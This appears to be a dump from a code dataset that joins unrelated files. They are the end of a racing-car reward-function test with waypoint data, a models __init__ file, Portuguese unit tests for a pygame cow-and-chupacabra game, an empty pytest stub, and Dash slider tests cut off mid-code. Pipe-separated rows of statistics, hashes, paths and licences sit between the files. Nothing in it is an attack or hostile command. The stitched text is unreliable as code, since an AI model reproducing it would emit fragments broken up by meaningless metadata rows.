'object_in_camera': False, 'heading': 0.7218580573268512, 'objects_speed': [], 'progress': 4.473396663395899, 'is_offtrack': False, 'objects_left_of_center': [], 'objects_location': [], 'closest_waypoints': [4, 5], 'track_length': 19.549800178858835, 'steering_angle': 0.0, 'steps': 14.0},
{'is_left_of_center': True, 'projection_distance': 0.9669518365713616, 'waypoints': [(2.973129727863096, 0.9587203451227853), (3.1686550001583385, 0.957973927514008), (3.3641587621388993, 0.957502662680531), (3.5596536099349976, 0.9571676056167091), (3.7551399311198708, 0.9569079073242543), (3.9506256709448877, 0.9566988842326032), (4.146107922610766, 0.9565304352142532), (4.341591530782978, 0.9563990236634121), (4.537073588662238, 0.9563010645276331), (4.732557196834449, 0.9562337963475989), (4.92803925471371, 0.9561973644632735), (5.123521506379589, 0.9561847441097273), (5.3190037580454685, 0.9562067146676283), (5.514486009711348, 0.9562466104877638), (5.709974462549027, 0.9563314648034498), (5.905463109173326, 0.9564632639275283), (6.10095815075604, 0.9566372843111675), (6.296465594682358, 0.956848729735553), (6.491997261936018, 0.9569796325965199), (6.6875785385640825, 0.9567336689306691), (6.883257677434614, 0.9557806263396478), (7.079130990497134, 0.9538671530427651), (7.275221344572657, 0.9543163504250318), (7.4705043835944585, 0.968040367211689), (7.662157411673801, 1.00506531126039), (7.845235769446617, 1.0715002572806311), (8.014446369208315, 1.1684281333446516), (8.165421648145468, 1.2924605804235763), (8.294117279524725, 1.4398041043387009), (8.397584218581926, 1.6056121986483556), (8.469351930116943, 1.7860276860462465), (8.511767170082862, 1.9763842816461406), (8.530750119682551, 2.1709724987464085), (8.535956778555175, 2.3671952090825386), (8.538760870928513, 2.563413656113056), (8.537808603483967, 2.75963888567523), (8.532572489045293, 2.95569387369283), (8.51481039514374, 3.15055503924561), (8.475491090199, 3.341414414227855), (8.407975057079398, 3.5247578720951225), (8.31106120632191, 3.693881267878382), (8.186502531679764, 3.844170542185153), (8.037129092933212, 3.969503006795976), (7.868136309330993, 4.066595722602571), (7.6851610460393545, 4.1345014606124835), (7.494133948738579, 4.175703983918254), (7.299554742716083, 4.195335731117524), (7.103587636930088, 4.201242347257079), (6.907607353654015, 4.201247579495785), (6.711783262392657, 4.199924210676329), (6.516154120469764, 4.199300605337186), (6.3205893157042965, 4.199124065727503), (6.125061330396392, 4.199215533011554), (5.929553692683456, 4.199390716114905), (5.734056325661314, 4.199555822314082), (5.538567872823634, 4.1996779078838955), (5.343080582705667, 4.199756585251109), (5.147595618027125, 4.199802318893134), (4.952113560147865, 4.199816465316303), (4.756630145762273, 4.199800962386803), (4.561147894096393, 4.19975794175744), (4.365664285924183, 4.199686628281739), (4.170183390764635, 4.199580045641426), (3.974701139098755, 4.1994405192759245), (3.779218887432876, 4.199264948599335), (3.5837366357669964, 4.199009925409058), (3.3881109820032407, 4.198595803404785), (3.3881109820032407, 4.198595803404785), (3.1927025630391057, 4.198236329227001), (2.997255774324458, 4.197737328683715), (2.801790188307791, 4.197125156755078), (2.6062952436183835, 4.195692686069265), (2.410804949807826, 4.190964292571721), (2.2150827903079318, 4.183555248776983), (2.0190451461927097, 4.16967140647651), (1.8255455254232797, 4.1381578265350925), (1.6399065197169342, 4.077816355401538), (1.4684209619443997, 3.98580995697732), (1.316564535251782, 3.863567226215878), (1.18828627180266, 3.716441712246848), (1.087181058714844, 3.5495077176822467), (1.0159622477774413, 3.3684589840609287), (0.9734102913519926, 3.178145699770326), (0.9534938958331036, 2.9834065228940503), (0.9444216541596013, 2.7872029974331767), (0.9405074066940884, 2.5907339843046135), (0.9396984929007637, 2.3942255355991335), (0.9471365077950047, 2.1980486557983383), (0.9667406161777752, 2.003330698556816), (1.008643508547042, 1.8129062776403588), (1.0777365771700467, 1.6310002804643384), (1.1746683531897695, 1.460860280079107), (1.2993533282606862, 1.3105290994160301), (1.4485447529255744, 1.1851194108376364), (1.618276541798405, 1.0898755162672418), (1.80267831683733, 1.026955253927975), (1.9950098887622332, 0.9923725057420933), (2.190220548481932, 0.9752908935522877), (2.3860145059240736, 0.9666594679897911), (2.581804490740531, 0.9621571992530031), (2.77751667022956, 0.9599051322865064), (2.973129727863096, 0.9587203451227853)], 'speed': 0.6666666666666666, 'x': 3.9401014233882807, 'is_crashed': False, 'is_reversed': False, 'objects_heading': [], 'y': 0.9776753407209586, 'all_wheels_on_track': True, 'distance_from_center': 0.020965191453877558, 'objects_distance_from_center': [], 'objects_distance': [], 'closest_objects': [0, 0], 'track_width': 0.6096028325562612, 'object_in_camera': False, 'heading': 1.9265306120411614, 'objects_speed': [], 'progress': 4.946095754047778, 'is_offtrack': False, 'objects_left_of_center': [], 'objects_location': [], 'closest_waypoints': [4, 5], 'track_length': 19.549800178858835, 'steering_angle': -30.0, 'steps': 15.0},
{'is_left_of_center': True, 'projection_distance': 1.0607562161378383, 'waypoints': [(2.973129727863096, 0.9587203451227853), (3.1686550001583385, 0.957973927514008), (3.3641587621388993, 0.957502662680531), (3.5596536099349976, 0.9571676056167091), (3.7551399311198708, 0.9569079073242543), (3.9506256709448877, 0.9566988842326032), (4.146107922610766, 0.9565304352142532), (4.341591530782978, 0.9563990236634121), (4.537073588662238, 0.9563010645276331), (4.732557196834449, 0.9562337963475989), (4.92803925471371, 0.9561973644632735), (5.123521506379589, 0.9561847441097273), (5.3190037580454685, 0.9562067146676283), (5.514486009711348, 0.9562466104877638), (5.709974462549027, 0.9563314648034498), (5.905463109173326, 0.9564632639275283), (6.10095815075604, 0.9566372843111675), (6.296465594682358, 0.956848729735553), (6.491997261936018, 0.9569796325965199), (6.6875785385640825, 0.9567336689306691), (6.883257677434614, 0.9557806263396478), (7.079130990497134, 0.9538671530427651), (7.275221344572657, 0.9543163504250318), (7.4705043835944585, 0.968040367211689), (7.662157411673801, 1.00506531126039), (7.845235769446617, 1.0715002572806311), (8.014446369208315, 1.1684281333446516), (8.165421648145468, 1.2924605804235763), (8.294117279524725, 1.4398041043387009), (8.397584218581926, 1.6056121986483556), (8.469351930116943, 1.7860276860462465), (8.511767170082862, 1.9763842816461406), (8.530750119682551, 2.1709724987464085), (8.535956778555175, 2.3671952090825386), (8.538760870928513, 2.563413656113056), (8.537808603483967, 2.75963888567523), (8.532572489045293, 2.95569387369283), (8.51481039514374, 3.15055503924561), (8.475491090199, 3.341414414227855), (8.407975057079398, 3.5247578720951225), (8.31106120632191, 3.693881267878382), (8.186502531679764, 3.844170542185153), (8.037129092933212, 3.969503006795976), (7.868136309330993, 4.066595722602571), (7.6851610460393545, 4.1345014606124835), (7.494133948738579, 4.175703983918254), (7.299554742716083, 4.195335731117524), (7.103587636930088, 4.201242347257079), (6.907607353654015, 4.201247579495785), (6.711783262392657, 4.199924210676329), (6.516154120469764, 4.199300605337186), (6.3205893157042965, 4.199124065727503), (6.125061330396392, 4.199215533011554), (5.929553692683456, 4.199390716114905), (5.734056325661314, 4.199555822314082), (5.538567872823634, 4.1996779078838955), (5.343080582705667, 4.199756585251109), (5.147595618027125, 4.199802318893134), (4.952113560147865, 4.199816465316303), (4.756630145762273, 4.199800962386803), (4.561147894096393, 4.19975794175744), (4.365664285924183, 4.199686628281739), (4.170183390764635, 4.199580045641426), (3.974701139098755, 4.1994405192759245), (3.779218887432876, 4.199264948599335), (3.5837366357669964, 4.199009925409058), (3.3881109820032407, 4.198595803404785), (3.3881109820032407, 4.198595803404785), (3.1927025630391057, 4.198236329227001), (2.997255774324458, 4.197737328683715), (2.801790188307791, 4.197125156755078), (2.6062952436183835, 4.195692686069265), (2.410804949807826, 4.190964292571721), (2.2150827903079318, 4.183555248776983), (2.0190451461927097, 4.16967140647651), (1.8255455254232797, 4.1381578265350925), (1.6399065197169342, 4.077816355401538), (1.4684209619443997, 3.98580995697732), (1.316564535251782, 3.863567226215878), (1.18828627180266, 3.716441712246848), (1.087181058714844, 3.5495077176822467), (1.0159622477774413, 3.3684589840609287), (0.9734102913519926, 3.178145699770326), (0.9534938958331036, 2.9834065228940503), (0.9444216541596013, 2.7872029974331767), (0.9405074066940884, 2.5907339843046135), (0.9396984929007637, 2.3942255355991335), (0.9471365077950047, 2.1980486557983383), (0.9667406161777752, 2.003330698556816), (1.008643508547042, 1.8129062776403588), (1.0777365771700467, 1.6310002804643384), (1.1746683531897695, 1.460860280079107), (1.2993533282606862, 1.3105290994160301), (1.4485447529255744, 1.1851194108376364), (1.618276541798405, 1.0898755162672418), (1.80267831683733, 1.026955253927975), (1.9950098887622332, 0.9923725057420933), (2.190220548481932, 0.9752908935522877), (2.3860145059240736, 0.9666594679897911), (2.581804490740531, 0.9621571992530031), (2.77751667022956, 0.9599051322865064), (2.973129727863096, 0.9587203451227853)], 'speed': 2.0, 'x': 4.033901501422587, 'is_crashed': False, 'is_reversed': False, 'objects_heading': [], 'y': 0.9776927210085827, 'all_wheels_on_track': True, 'distance_from_center': 0.02106558857389254, 'objects_distance_from_center': [], 'objects_distance': [], 'closest_objects': [0, 0], 'track_width': 0.6095984499001538, 'object_in_camera': False, 'heading': 1.173909182022218, 'objects_speed': [], 'progress': 5.425918456624128, 'is_offtrack': False, 'objects_left_of_center': [], 'objects_location': [], 'closest_waypoints': [5, 6], 'track_length': 19.549800178858835, 'steering_angle': 30.0, 'steps': 16.0},
{'is_left_of_center': True, 'projection_distance': 1.1450366160526708, 'waypoints': [(2.973129727863096, 0.9587203451227853), (3.1686550001583385, 0.957973927514008), (3.3641587621388993, 0.957502662680531), (3.5596536099349976, 0.9571676056167091), (3.7551399311198708, 0.9569079073242543), (3.9506256709448877, 0.9566988842326032), (4.146107922610766, 0.9565304352142532), (4.341591530782978, 0.9563990236634121), (4.537073588662238, 0.9563010645276331), (4.732557196834449, 0.9562337963475989), (4.92803925471371, 0.9561973644632735), (5.123521506379589, 0.9561847441097273), (5.3190037580454685, 0.9562067146676283), (5.514486009711348, 0.9562466104877638), (5.709974462549027, 0.9563314648034498), (5.905463109173326, 0.9564632639275283), (6.10095815075604, 0.9566372843111675), (6.296465594682358, 0.956848729735553), (6.491997261936018, 0.9569796325965199), (6.6875785385640825, 0.9567336689306691), (6.883257677434614, 0.9557806263396478), (7.079130990497134, 0.9538671530427651), (7.275221344572657, 0.9543163504250318), (7.4705043835944585, 0.968040367211689), (7.662157411673801, 1.00506531126039), (7.845235769446617, 1.0715002572806311), (8.014446369208315, 1.1684281333446516), (8.165421648145468, 1.2924605804235763), (8.294117279524725, 1.4398041043387009), (8.397584218581926, 1.6056121986483556), (8.469351930116943, 1.7860276860462465), (8.511767170082862, 1.9763842816461406), (8.530750119682551, 2.1709724987464085), (8.535956778555175, 2.3671952090825386), (8.538760870928513, 2.563413656113056), (8.537808603483967, 2.75963888567523), (8.532572489045293, 2.95569387369283), (8.51481039514374, 3.15055503924561), (8.475491090199, 3.341414414227855), (8.407975057079398, 3.5247578720951225), (8.31106120632191, 3.693881267878382), (8.186502531679764, 3.844170542185153), (8.037129092933212, 3.969503006795976), (7.868136309330993, 4.066595722602571), (7.6851610460393545, 4.1345014606124835), (7.494133948738579, 4.175703983918254), (7.299554742716083, 4.195335731117524), (7.103587636930088, 4.201242347257079), (6.907607353654015, 4.201247579495785), (6.711783262392657, 4.199924210676329), (6.516154120469764, 4.199300605337186), (6.3205893157042965, 4.199124065727503), (6.125061330396392, 4.199215533011554), (5.929553692683456, 4.199390716114905), (5.734056325661314, 4.199555822314082), (5.538567872823634, 4.1996779078838955), (5.343080582705667, 4.199756585251109), (5.147595618027125, 4.199802318893134), (4.952113560147865, 4.199816465316303), (4.756630145762273, 4.199800962386803), (4.561147894096393, 4.19975794175744), (4.365664285924183, 4.199686628281739), (4.170183390764635, 4.199580045641426), (3.974701139098755, 4.1994405192759245), (3.779218887432876, 4.199264948599335), (3.5837366357669964, 4.199009925409058), (3.3881109820032407, 4.198595803404785), (3.3881109820032407, 4.198595803404785), (3.1927025630391057, 4.198236329227001), (2.997255774324458, 4.197737328683715), (2.801790188307791, 4.197125156755078), (2.6062952436183835, 4.195692686069265), (2.410804949807826, 4.190964292571721), (2.2150827903079318, 4.183555248776983), (2.0190451461927097, 4.16967140647651), (1.8255455254232797, 4.1381578265350925), (1.6399065197169342, 4.077816355401538), (1.4684209619443997, 3.98580995697732), (1.316564535251782, 3.863567226215878), (1.18828627180266, 3.716441712246848), (1.087181058714844, 3.5495077176822467), (1.0159622477774413, 3.3684589840609287), (0.9734102913519926, 3.178145699770326), (0.9534938958331036, 2.9834065228940503), (0.9444216541596013, 2.7872029974331767), (0.9405074066940884, 2.5907339843046135), (0.9396984929007637, 2.3942255355991335), (0.9471365077950047, 2.1980486557983383), (0.9667406161777752, 2.003330698556816), (1.008643508547042, 1.8129062776403588), (1.0777365771700467, 1.6310002804643384), (1.1746683531897695, 1.460860280079107), (1.2993533282606862, 1.3105290994160301), (1.4485447529255744, 1.1851194108376364), (1.618276541798405, 1.0898755162672418), (1.80267831683733, 1.026955253927975), (1.9950098887622332, 0.9923725057420933), (2.190220548481932, 0.9752908935522877), (2.3860145059240736, 0.9666594679897911), (2.581804490740531, 0.9621571992530031), (2.77751667022956, 0.9599051322865064), (2.973129727863096, 0.9587203451227853)], 'speed': 2.0, 'x': 4.118181848735966, 'is_crashed': False, 'is_reversed': False, 'objects_heading': [], 'y': 0.9775953652797049, 'all_wheels_on_track': True, 'distance_from_center': 0.02104085807541295, 'objects_distance_from_center': [], 'objects_distance': [], 'closest_objects': [0, 0], 'track_width': 0.6095984166466617, 'object_in_camera': False, 'heading': 0.816198971909553, 'objects_speed': [], 'progress': 5.857024652819286, 'is_offtrack': False, 'objects_left_of_center': [], 'objects_location': [], 'closest_waypoints': [5, 6], 'track_length': 19.549800178858835, 'steering_angle': 20.0, 'steps': 17.0}
]
for step in params:
print(step)
print(reward_function(step))
# print(reward_function(params[0]))
if __name__ == '__main__':
main()
# stepRewardsCSV.close()
# stepLocationsCSV.close()
| 2,143.358974
| 4,891
| 0.791712
| 8,485
| 83,591
| 7.739776
| 0.049146
| 0.003106
| 0.006213
| 0.017085
| 0.957166
| 0.957166
| 0.950177
| 0.950177
| 0.949019
| 0.928189
| 0
| 0.752326
| 0.055126
| 83,591
| 38
| 4,892
| 2,199.763158
| 0.079144
| 0.002596
| 0
| 0
| 0
| 0
| 0.069021
| 0.010196
| 0
| 0
| 0
| 0
| 0
| 1
| 0.034483
| false
| 0
| 0.137931
| 0
| 0.172414
| 0.068966
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
48a30895dbb6abf7a374bd2cc5d6a58bf780fd55
| 182
|
py
|
Python
|
files/models/__init__.py
|
exolever/django_filestack
|
53d00e14721bb672340ebf7f199812b8d16a122a
|
[
"BSD-3-Clause"
] | 3
|
2019-04-12T19:26:45.000Z
|
2019-06-06T22:59:21.000Z
|
files/models/__init__.py
|
exolever/django-filestack
|
53d00e14721bb672340ebf7f199812b8d16a122a
|
[
"BSD-3-Clause"
] | null | null | null |
files/models/__init__.py
|
exolever/django-filestack
|
53d00e14721bb672340ebf7f199812b8d16a122a
|
[
"BSD-3-Clause"
] | null | null | null |
from .uploaded_file import UploadedFile # noqa
from .uploaded_file_version import UploadedFileVersion # noqa
from .uploaded_file_visibility import UploadedFileVisibility # noqa
| 45.5
| 68
| 0.840659
| 20
| 182
| 7.4
| 0.5
| 0.243243
| 0.324324
| 0.27027
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.126374
| 182
| 3
| 69
| 60.666667
| 0.930818
| 0.076923
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
48ab1b11ea750f21dc5cf81f1f24b9cd3d86b4c4
| 6,060
|
py
|
Python
|
example/tests.py
|
helioh2/pygame-universe
|
94be98072ff1644480aaaab9692c8040223c3fb1
|
[
"MIT"
] | 1
|
2018-04-04T17:55:35.000Z
|
2018-04-04T17:55:35.000Z
|
example/tests.py
|
helioh2/pygame-universe
|
94be98072ff1644480aaaab9692c8040223c3fb1
|
[
"MIT"
] | null | null | null |
example/tests.py
|
helioh2/pygame-universe
|
94be98072ff1644480aaaab9692c8040223c3fb1
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import unittest
from funcoes import *
class MeusTestes(unittest.TestCase):
def testMover_vaca_x(self):
# Vaca andando para frente (sem bater na parede)
self.assertEqual(mover_vaca_x(Vaca(PAREDE_ESQUERDA, 3, CHAO, 0)), Vaca(PAREDE_ESQUERDA + 3, 3, CHAO, 0))
self.assertEqual(mover_vaca_x(Vaca(LARGURA // 2, 3, CHAO, 0)), Vaca(LARGURA // 2 + 3, 3, CHAO, 0))
# Vaca andando para tras (sem bater na parede)
self.assertEqual(mover_vaca_x(Vaca(LARGURA // 2, -3, CHAO, 0)), Vaca(LARGURA // 2 - 3, -3, CHAO, 0))
# Vaca no limite direito, e tendo que voltar
self.assertEqual(mover_vaca_x(Vaca(PAREDE_DIREITA, 3, CHAO, 0)), Vaca(PAREDE_DIREITA - 3, -3, CHAO, 0))
# Vaca no limite esquerdo, e tendo que voltar
self.assertEqual(mover_vaca_x(Vaca(PAREDE_ESQUERDA, -3, CHAO, 0)), Vaca(PAREDE_ESQUERDA + 3, 3, CHAO, 0))
# Vaca quase atingindo limite direito, e parando no limite
self.assertEqual(mover_vaca_x(Vaca(PAREDE_DIREITA - 2, 3, CHAO, 0)), Vaca(PAREDE_DIREITA, 3, CHAO, 0))
self.assertEqual(mover_vaca_x(Vaca(PAREDE_DIREITA - 1, 3, CHAO, 0)), Vaca(PAREDE_DIREITA, 3, CHAO, 0))
# Vaca quase atingindo limite esquerdo, e parando no limite
self.assertEqual(mover_vaca_x(Vaca(PAREDE_ESQUERDA + 2, -3, CHAO, 0)), Vaca(PAREDE_ESQUERDA, -3, CHAO, 0))
self.assertEqual(mover_vaca_x(Vaca(PAREDE_ESQUERDA + 1, -3, CHAO, 0)), Vaca(PAREDE_ESQUERDA, -3, CHAO, 0))
def testMover_vaca_y(self):
#QUEDA LIVRE
self.assertEqual(mover_vaca_y(
Vaca(x=PAREDE_ESQUERDA, dx=0, y=60, dy=0)),
Vaca(x=PAREDE_ESQUERDA, dx=0, y=60+G, dy=G))
self.assertEqual(mover_vaca_y(
Vaca(x=PAREDE_ESQUERDA, dx=0, y=(60 + G), dy=G)),
Vaca(x=PAREDE_ESQUERDA, dx=0, y=(60 + G) + G+G, dy=G+G))
# JA ESTÁ NO CHAO
self.assertEqual(mover_vaca_y(
Vaca(x=PAREDE_ESQUERDA, dx=0, y=CHAO, dy=0)),
Vaca(x=PAREDE_ESQUERDA, dx=0, y=CHAO, dy=0))
# CHEGANDO NO CHAO
self.assertEqual(mover_vaca_y(
Vaca(x=PAREDE_ESQUERDA, dx=0, y=CHAO-2*G, dy=3*G)),
Vaca(x=PAREDE_ESQUERDA, dx=0, y=CHAO, dy=0))
self.assertEqual(mover_vaca_y(
Vaca(x=PAREDE_ESQUERDA, dx=0, y=CHAO - 3 * G, dy=3 * G)),
Vaca(x=PAREDE_ESQUERDA, dx=0, y=CHAO, dy=0))
def testTrata_tecla(self):
self.assertEqual(trata_tecla_vaca(Vaca(50, 0, CHAO, 0), pg.K_LEFT), Vaca(50, -DX, CHAO, 0))
self.assertEqual(trata_tecla_vaca(Vaca(50, 0,CHAO, 0), pg.K_RIGHT), Vaca(50, DX, CHAO, 0))
# self.assertEqual(trata_tecla_vaca(Vaca(100, -3), pg.K_SPACE), Vaca(100, 3))
self.assertEqual(trata_tecla_vaca(Vaca(50, 3, CHAO, 0), pg.K_a), Vaca(50, 3, CHAO, 0))
# self.assertNotEqual( trata_tecla(Vaca(100, -3), pg.K_a), Vaca(100, 3))
self.assertEqual(trata_tecla_vaca(Vaca(50, 0, CHAO, 0), pg.K_UP), Vaca(50, 0, CHAO-10, -20))
def testTrataSoltaTecla(self):
self.assertEqual(trata_solta_tecla_vaca(Vaca(50, -DX, CHAO, 0), pg.K_LEFT), Vaca(50, 0, CHAO, 0))
self.assertEqual(trata_solta_tecla_vaca(Vaca(50, DX, CHAO, 0), pg.K_RIGHT), Vaca(50, 0, CHAO, 0))
def testMover_cc(self):
# Chupacabra andando para frente (sem bater na parede)
self.assertEqual(mover_cc(Chupacabra(X_CC,y=PAREDE_CIMA, dy=3)), Chupacabra(X_CC, y=PAREDE_CIMA + 3, dy=3))
self.assertEqual(mover_cc(Chupacabra(X_CC, ALTURA // 2, 3)), Chupacabra(X_CC, ALTURA // 2 + 3, 3))
# Chupacabra andando para tras (sem bater na parede)
self.assertEqual(mover_cc(Chupacabra(X_CC, ALTURA // 2, -3)), Chupacabra(X_CC, ALTURA // 2 - 3, -3))
# Chupacabra no limite direito, e tendo que voltar
self.assertEqual(mover_cc(Chupacabra(X_CC, PAREDE_BAIXO, 3)), Chupacabra(X_CC, PAREDE_BAIXO - 3, -3))
# Chupacabra no limite esquerdo, e tendo que voltar
self.assertEqual(mover_cc(Chupacabra(X_CC, PAREDE_CIMA, -3)), Chupacabra(X_CC, PAREDE_CIMA + 3, 3))
# Chupacabra quase atingindo limite direito, e parando no limite
self.assertEqual(mover_cc(Chupacabra(X_CC, PAREDE_BAIXO - 2, 3)), Chupacabra(X_CC, PAREDE_BAIXO, 3))
self.assertEqual(mover_cc(Chupacabra(X_CC, PAREDE_BAIXO - 1, 3)), Chupacabra(X_CC, PAREDE_BAIXO, 3))
# Chupacabra quase atingindo limite esquerdo, e parando no limite
self.assertEqual(mover_cc(Chupacabra(X_CC, PAREDE_CIMA + 2, -3)), Chupacabra(X_CC, PAREDE_CIMA, -3))
self.assertEqual(mover_cc(Chupacabra(X_CC, PAREDE_CIMA + 1, -3)), Chupacabra(X_CC, PAREDE_CIMA, -3))
def testDistancia(self):
self.assertEqual(distancia(0, 4, 3, 0), 5)
import math
self.assertEqual(distancia(1, 2, 3, 4), math.sqrt((3 - 1) ** 2 + (4 - 2) ** 2))
def testMover_jogo(self):
self.assertEqual(mover_jogo(
Jogo(vaca=Vaca(PAREDE_ESQUERDA, 3, CHAO, 0),
chupacabras=[Chupacabra(X_CC, PAREDE_CIMA, 3)],
game_over=False)),
Jogo(vaca=Vaca(PAREDE_ESQUERDA + 3, 3, CHAO, 0),
chupacabras=[Chupacabra(X_CC, PAREDE_CIMA + 3, 3)],
game_over=False) )
self.assertEqual(mover_jogo(
Jogo(vaca=Vaca(X_CC, 3, CHAO, 0),
chupacabras=[Chupacabra(X_CC, CHAO, 3)],
game_over=False)),
Jogo(vaca=Vaca(X_CC, 3, CHAO, 0),
chupacabras=[Chupacabra(X_CC, CHAO, 3)],
game_over=True))
def testColidirem(self):
self.assertFalse(colidirem(VACA_INICIAL, CC_INICIAL))
self.assertTrue(colidirem(Vaca(X_CC, 3, CHAO, 0), Chupacabra(X_CC, CHAO, 3)))
self.assertTrue(colidirem(
Vaca(X_CC, 3, CHAO, 0),
Chupacabra(X_CC, CHAO - IMG_VACA_INO.get_width() // 2 + 3, 3)))
# unittest.main()
| 47.34375
| 115
| 0.615017
| 899
| 6,060
| 3.978865
| 0.113459
| 0.048924
| 0.043612
| 0.093933
| 0.850154
| 0.830584
| 0.814649
| 0.719597
| 0.708974
| 0.640201
| 0
| 0.045514
| 0.245875
| 6,060
| 127
| 116
| 47.716535
| 0.737199
| 0.144059
| 0
| 0.222222
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0.111111
| false
| 0
| 0.041667
| 0
| 0.166667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
48b2c386804d00673a336240b01fafe57a49f593
| 42
|
py
|
Python
|
scripts/tests/test.py
|
karry3775/AutomatingTheBoringStuffWithPython
|
7c7850cd303fac5460fffc460e60da457f5d8a9b
|
[
"MIT"
] | null | null | null |
scripts/tests/test.py
|
karry3775/AutomatingTheBoringStuffWithPython
|
7c7850cd303fac5460fffc460e60da457f5d8a9b
|
[
"MIT"
] | null | null | null |
scripts/tests/test.py
|
karry3775/AutomatingTheBoringStuffWithPython
|
7c7850cd303fac5460fffc460e60da457f5d8a9b
|
[
"MIT"
] | null | null | null |
import pytest
def test_none():
pass
| 7
| 16
| 0.666667
| 6
| 42
| 4.5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.261905
| 42
| 5
| 17
| 8.4
| 0.870968
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
|
0
| 7
|
d28c0429c6f9869b435b6d701177537b5a41b747
| 10,414
|
py
|
Python
|
packages/dash-core-components/tests/integration/sliders/test_sliders.py
|
HammadTheOne/dash
|
5676e4d8b1f090eab9ac1480a44e98837edd859b
|
[
"MIT"
] | null | null | null |
packages/dash-core-components/tests/integration/sliders/test_sliders.py
|
HammadTheOne/dash
|
5676e4d8b1f090eab9ac1480a44e98837edd859b
|
[
"MIT"
] | null | null | null |
packages/dash-core-components/tests/integration/sliders/test_sliders.py
|
HammadTheOne/dash
|
5676e4d8b1f090eab9ac1480a44e98837edd859b
|
[
"MIT"
] | null | null | null |
import dash
from dash.dependencies import Input, Output
import dash_html_components as html
import dash_core_components as dcc
def test_slsl001_always_visible_slider(dash_dcc):
app = dash.Dash(__name__)
app.layout = html.Div(
[
dcc.Slider(
id="slider",
min=0,
max=20,
step=1,
value=5,
tooltip={"always_visible": True},
),
html.Div(id="out"),
]
)
@app.callback(Output("out", "children"), [Input("slider", "value")])
def update_output(value):
return "You have selected {}".format(value)
dash_dcc.start_server(app)
dash_dcc.wait_for_text_to_equal("#out", "You have selected 5")
slider = dash_dcc.find_element("#slider")
dash_dcc.click_at_coord_fractions(slider, 0.5, 0.25)
dash_dcc.wait_for_text_to_equal("#out", "You have selected 10")
dash_dcc.click_at_coord_fractions(slider, 0.75, 0.25)
dash_dcc.wait_for_text_to_equal("#out", "You have selected 15")
def test_slsl002_always_visible_rangeslider(dash_dcc):
app = dash.Dash(__name__)
app.layout = html.Div(
style={"width": "400px"},
children=[
dcc.RangeSlider(
id="rangeslider",
min=0,
max=20,
step=1,
value=[5, 15],
tooltip={"always_visible": True},
),
html.Div(id="out"),
],
)
@app.callback(Output("out", "children"), [Input("rangeslider", "value")])
def update_output(rng):
return "You have selected {}-{}".format(*rng)
dash_dcc.start_server(app)
dash_dcc.wait_for_text_to_equal("#out", "You have selected 5-15")
slider = dash_dcc.find_element("#rangeslider")
dash_dcc.click_at_coord_fractions(slider, 0.15, 0.25)
dash_dcc.wait_for_text_to_equal("#out", "You have selected 2-15")
dash_dcc.click_at_coord_fractions(slider, 0.5, 0.25)
dash_dcc.wait_for_text_to_equal("#out", "You have selected 2-10")
def test_slsl003_out_of_range_marks_slider(dash_dcc):
app = dash.Dash(__name__)
app.layout = html.Div(
[
dcc.Slider(
min=0, max=5, marks={i: "Label {}".format(i) for i in range(-1, 10)}
)
]
)
dash_dcc.start_server(app)
assert len(dash_dcc.find_elements("span.rc-slider-mark-text")) == 6
def test_slsl004_out_of_range_marks_rangeslider(dash_dcc):
app = dash.Dash(__name__)
app.layout = html.Div(
[
dcc.RangeSlider(
min=0, max=5, marks={i: "Label {}".format(i) for i in range(-1, 10)}
)
]
)
dash_dcc.start_server(app)
assert len(dash_dcc.find_elements("span.rc-slider-mark-text")) == 6
def test_slsl005_slider_tooltip(dash_dcc):
app = dash.Dash(__name__)
app.layout = html.Div(
[
html.Div(
[
html.Div(
dcc.Slider(
min=0,
max=100,
value=65,
tooltip={"always_visible": True, "placement": "top"},
),
style=dict(height=100),
),
html.Div(
dcc.Slider(
min=0,
max=100,
value=65,
tooltip={"always_visible": True, "placement": "top"},
),
style=dict(height=100),
),
html.Div(
dcc.Slider(
min=0,
max=100,
value=65,
tooltip={"always_visible": True, "placement": "top"},
),
style=dict(height=100),
),
html.Div(
dcc.Slider(
min=0,
max=100,
value=65,
tooltip={"always_visible": True, "placement": "top"},
),
style=dict(height=100),
),
html.Div(
dcc.Slider(
id="test-slider",
min=0,
max=100,
value=65,
tooltip={"always_visible": True, "placement": "top"},
),
style=dict(height=100),
),
],
style=dict(maxHeight=300, overflowX="scroll"),
)
]
)
dash_dcc.start_server(app)
dash_dcc.wait_for_element("#test-slider")
dash_dcc.percy_snapshot(
"slider-make sure tooltips are only visible if parent slider is visible"
)
def test_slsl005_rangeslider_tooltip(dash_dcc):
app = dash.Dash(__name__)
app.layout = html.Div(
[
html.Div(
[
html.Div(
dcc.RangeSlider(
min=0,
max=100,
